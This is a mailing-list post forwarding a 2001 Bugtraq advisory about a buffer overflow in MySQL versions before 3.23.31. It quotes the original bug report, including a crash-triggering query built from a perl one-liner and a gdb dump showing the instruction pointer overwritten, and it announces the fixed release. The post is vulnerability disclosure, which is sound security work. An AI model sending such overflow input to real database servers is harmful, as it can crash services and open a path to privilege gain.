Howdy! Just for us MySQL users I'm forwarding this from bugtraq. Ragnar >Hi, > >all versions of MySQL < 3.23.31 have a buffer-overflow which crashs the >server and which seems to be exploitable (ie. 4141414 in eip) > >Problem : >An attacker could gain mysqld privileges (gaining access to all the >databases) > >Requirements : >You need a valid login/password to exploit this > >Solution : >Upgrade to 3.23.31 > >Proof-of-concept code : >None > >Credits : >I'm not the discoverer of this bug >The first public report was made by [EMAIL PROTECTED] via the MySQL >mailing-list >See the following mails for details > >Regards, >Nicob > >Here the original post to the MySQL mailing-list : >================================================== > >On Jan 12, Jo?o Gouveia wrote: >> Hi, >> >> I believe i've found a problem in MySql. Here are some test's i've made in >> 3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't >> debug it, just tested to see if crashes ).Confirmed up to latest 3.23 > >> On one terminal: >> <quote> >> spike:/var/mysql # /sbin/init.d/mysql start >> Starting service MySQL. >> Starting mysqld daemon with databases from /var/mysql >> done >> spike:/var/mysql # >></quote> >> >> On the other terminal: >> <quote> >> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b' >> Enter password: >> (hanged..^C) >> </quote> >> >> On the first terminal i got: >> <quote> >> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault >> nohup >> $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin >> g "$@" >>$err_log 2>&1> >> Number of processes running now: 0 >> mysqld restarted on Fri Jan 12 07:10:54 WET 2001 >> mysqld daemon ended >> </quote> >> >> gdb shows the following: >> <quote> >> (gdb) run >> Starting program: /usr/sbin/mysqld >> [New Thread 16897 (manager thread)] >> [New Thread 16891 (initial thread)] >> [New Thread 16898] >> /usr/sbin/mysqld: ready for connections >> [New Thread 16916] >> [Switching to Thread 16916] >> >> Program received signal SIGSEGV, Segmentation fault. >> 0x41414141 in ?? () >> (gdb) info all-registers >> eax 0x1 1 >> ecx 0x68 104 >> edx 0x8166947 135686471 >> ebx 0x41414141 1094795585 >> esp 0xbf5ff408 0xbf5ff408 >> ebp 0x41414141 0x41414141 >> esi 0x41414141 1094795585 >> edi 0x0 0 >> eip 0x41414141 0x41414141 >> eflags 0x10246 66118 >> cs 0x23 35 >> ss 0x2b 43 >> ds 0x2b 43 >> es 0x2b 43 >> fs 0x0 0 >> gs 0x0 0 >> (gdb) >> </quote> >> >> looks like a tipical overflow to me. >> Please reply asap, at least to tell me i'me not seeing things. :-)> >> Best regards, >> >> Joao Gouveia aka Tharbad. >> >> [EMAIL PROTECTED] > >Here the reponse to a email I send today to the MySQL list : >============================================================ > >Sergei Golubchik (MySQL team) wrote : >> >> Hi! >> >> On Jan 18, Nicolas GREGOIRE wrote: >> > Hi, >> > >> > Still not any info about the buffer-overflow discovered last week ? >> > Shouldn't be fixed at the beginning of the week ? >> > >> > Please, dear MySQL team, give us info !! >> > >> > Regards, >> > Nicob >> >> Fixed in latest release (3.23.31). >> >> Regards, >> Sergei > >Here an part of the 3.23.30 to 3.23.31 diff : >============================================= > >+Changes in release 3.23.31 >+-------------------------- >+ >+ * Fixed security bug in something (please upgrade if you are using a >+ earlier MySQL 3.23 version). _______________________________________________ Zope maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope-dev )